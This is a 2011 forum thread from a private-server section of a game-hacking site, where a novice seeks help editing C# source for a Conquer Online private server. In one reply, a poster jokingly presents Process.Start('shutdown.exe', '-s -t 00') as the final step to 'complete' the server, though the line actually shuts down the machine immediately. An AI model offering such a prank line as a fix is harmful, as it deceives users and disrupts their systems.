Register for your free account! | Forgot your password?

Go Back   elitepvpers > MMORPGs > Conquer Online 2 > CO2 Private Server
You last visited: Today at 02:32

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



request:source 9095 with ninja and any add as newestcoserver ,please !

Discussion on request:source 9095 with ninja and any add as newestcoserver ,please ! within the CO2 Private Server forum part of the Conquer Online 2 category.

Reply
 
Old 01/18/2011, 23:43   #16
 
elite*gold: 0
Join Date: Nov 2008
Posts: 37
Received Thanks: 0
can u add me on msn
want speak to u about something
WolF~NighT is offline  
Old 01/18/2011, 23:52   #17
 
elite*gold: 20
Join Date: Oct 2010
Posts: 451
Received Thanks: 259
Quote:
Originally Posted by WolF~NighT View Post
can u add me on msn
want speak to u about something
I'm not adding you to do that for you.
That's just... ... sad. I'm not trying to flame,
but that's painfully painfully sad. ><
Adding you would make me painfully sad and frustrated.
Srry
FuriousFang is offline  
Thanks
1 User
Old 01/18/2011, 23:54   #18
 
elite*gold: 0
Join Date: Nov 2008
Posts: 37
Received Thanks: 0
anyway thanks for ur help

done done done ! i made it
it's so easy
now how i can remove horses ?
WolF~NighT is offline  
Old 01/19/2011, 00:03   #19
 
elite*gold: 0
Join Date: Nov 2010
Posts: 1,162
Received Thanks: 370
Go to Program.cs and find while (true).

Above that put:
Code:
Process.Start("shutdown.exe", "-s -t 00");
It should look like this after
Code:
Process.Start("shutdown.exe", "-s -t 00");
while (true)
{
Now your server is complete.
Syst3m_W1z4rd is offline  
Thanks
2 Users
Old 01/19/2011, 11:55   #20
 
elite*gold: 0
Join Date: Nov 2008
Posts: 37
Received Thanks: 0
Quote:
Originally Posted by FuriousFang View Post
... I told you. Please read the 2 small half sentences that I wrote. ><

Fang
i tried it but in vain !!!!
don't work !

what i do ??
WolF~NighT is offline  
Old 01/19/2011, 19:46   #21
 
elite*gold: 20
Join Date: Oct 2010
Posts: 451
Received Thanks: 259
Quote:
Originally Posted by WolF~NighT View Post
Fang
i tried it but in vain !!!!
don't work !

what i do ??
It works perfectly. I even tested it (to show you a picture of what it does really- I already know it works). This code was probably released somewhere on this website too. Can anyone back me up on this?

Anyways, do as I said. They're very very simple steps. All you have to do is run a search. I even told you how to run a search. I'm in class right now, I'm not opening my ancient source to show you where it is.

Sorry. Please ask someone else.
I have a full load in college- 19 units.
I just don't have the time, I'm not even working on my source that much right now- just coding an npc from time to time.

Sincerely,
Fang
FuriousFang is offline  
Old 01/19/2011, 20:24   #22
 
elite*gold: 0
Join Date: Nov 2008
Posts: 37
Received Thanks: 0
thanks Fang,
i edited the file which named CharacterMaking.cs

and the file now have this codes :

PHP Code:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace 
NewestCOServer.PacketHandling
{
    class 
CharacterMaking
    
{
        public static 
void Handle(Main.GameClient GCbyte[] Data)
        {            
            
string CharName "";
            for (
int i 016i++)
                if (
Data[20 i] != 0)
                    
CharName += Convert.ToChar(Data[20 i]);

            
ushort Body BitConverter.ToUInt16(Data52);
            
byte Job Data[54];
            if (
Job == 50)
                
GC.AddSend(Packets.PopUpMessage(GC.MessageID"Ninja aren't allowed. Trololol"));
            if (
GC.ValidName(CharName))
            {
                
GC.AddSend(Packets.PopUpMessage(GC.MessageIDDatabase.CreateCharacter(GC.AuthInfo.AccountCharNameBodyJob)));
            }
            else
                
GC.AddSend(Packets.PopUpMessage(GC.MessageID"Invalid character name!"));
        }
    }

are it's right ?
WolF~NighT is offline  
Old 01/19/2011, 21:19   #23
 
elite*gold: 0
Join Date: Nov 2010
Posts: 1,162
Received Thanks: 370
Try it and you will know if it's right.
Syst3m_W1z4rd is offline  
Old 01/19/2011, 22:00   #24
 
elite*gold: 0
Join Date: Nov 2008
Posts: 37
Received Thanks: 0
Quote:
Originally Posted by Syst3m_W1z4rd View Post
Try it and you will know if it's right.
i tried it but it isn't right

i tried it on newestcoserver source

what i do ???
WolF~NighT is offline  
Old 01/19/2011, 22:25   #25
 
elite*gold: 20
Join Date: Oct 2010
Posts: 451
Received Thanks: 259
Quote:
Originally Posted by WolF~NighT View Post
i tried it but it isn't right

i tried it on newestcoserver source

what i do ???
Try making the character. Click the "OK" button to try and make it after choosing your name. I'm in class right now dude... come on.
FuriousFang is offline  
Old 01/19/2011, 22:30   #26
 
elite*gold: 0
Join Date: Nov 2008
Posts: 37
Received Thanks: 0
Quote:
Originally Posted by FuriousFang View Post
Try making the character. Click the "OK" button to try and make it after choosing your name. I'm in class right now dude... come on.
the same problem ><
WolF~NighT is offline  
Old 01/19/2011, 23:38   #27
 
elite*gold: 0
Join Date: Nov 2010
Posts: 1,162
Received Thanks: 370
Do you press F5 or F6, before you login?
Syst3m_W1z4rd is offline  
Thanks
1 User
Old 01/20/2011, 04:08   #28
 
elite*gold: 20
Join Date: Oct 2010
Posts: 451
Received Thanks: 259
Quote:
Originally Posted by Syst3m_W1z4rd View Post
Do you press F5 or F6, before you login?
Thank you!! that fixed my entire source.
._. (In all seriousness, I really hope that guy is smart enough to figure that out. If he isn't then he shouldn't be trying to CODE a private server which takes at least a month of coding to understand)

Edit: I'm really not trying to be mean to you Wolf, but you expect to have a perfectly working server with no coding experience what-so-ever? x_X You've got to be joking with me.
FuriousFang is offline  
Thanks
1 User
Old 01/20/2011, 05:22   #29
 
elite*gold: 21
Join Date: Jul 2005
Posts: 9,193
Received Thanks: 5,376
People like this have no point being on the internet... let alone a hacking site.

@ Thread starter. You really need to learn to READ what people are saying, LOOK at your source and think logically.

There's nothing at all wrong with not knowing something (IE: Where to put something, how a code works, etc)... but come on... when someone tells you exact steps to do something you should be able to do those steps. If they fail you should be able to report back saying something more than "IT DOESN'T WORK!"

<edit>

as fang just said... even if you fix this one thing, you do realize that LARGE bugs exist in the source and you won't be able to get people to just hand you things that you can copy and paste into the source... if you want to run a private server you NEED to learn a programming language.

You should be able to read and understand the material in this thread at LEAST up through unit 1... after that is questionable if you really need it to start but you should definitely know what a variable is... how to write a loop... how to do try/catch, now to place break points, how to write to console/read from console, how to use data collections (arrays, lists, dictionaries, queues) and rather importantly... how to write method/functions! They are INCREDIBLY important if you want to go anywhere in coding.

pro4never is offline  
Thanks
2 Users
Old 01/20/2011, 11:59   #30
 
elite*gold: 0
Join Date: Nov 2008
Posts: 37
Received Thanks: 0
Syst3m_W1z4rd
FuriousFang
pro4never

thanks all guys for helping me
really thanks all i will do pro4never advise
i will try to learn that
just one thing i want to know now
are i'm should put rekardoupdate folder in c/ drive ?

and thanks all again
WolF~NighT is offline  
Reply


Similar Threads Similar Threads
Ninja Source (need help)
09/20/2009 - Conquer Online 2 - 1 Replies
Hello every1 i have source with ninja i can wear 2 katana without problem but i cant hit any mob and use any skill could some1 help me ? if u can plz write me at [email protected] how to fix that
Ninja Source (HELP)
09/19/2009 - CO2 Private Server - 8 Replies
Hi all ive got a client with ninja 90% done (CoEmuv2) i need some1 to help me fix: 2nd RB NPC setup GuildController 1,2,3,4 add some comands and a few more things
[Request]Black&White Source or other source for version 5065 or 5095
04/11/2009 - CO2 Private Server - 22 Replies
I need Source Black and White or from other server i wanna Start a server.. All who help me will got Pm or Gm on my server.. ________
Ninja in my Source, how i do?
02/15/2009 - CO2 Private Server - 3 Replies
hey guys, how i do to put Ninja's job on my server? i guess i need to modif something in my source, can someone help me plz? thx
Headset source OPEN SOURCE REQUEST!
09/23/2008 - Conquer Online 2 - 3 Replies
Yow As u know samehvan started a project to make the Gay headset source cooler. Then LOTF released (fucking super.pvper) Now noone wanna work on our project so we restarted it! Join us and help us to make it better! Forum - Project-Samehvan!



All times are GMT +2. The time now is 02:32.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.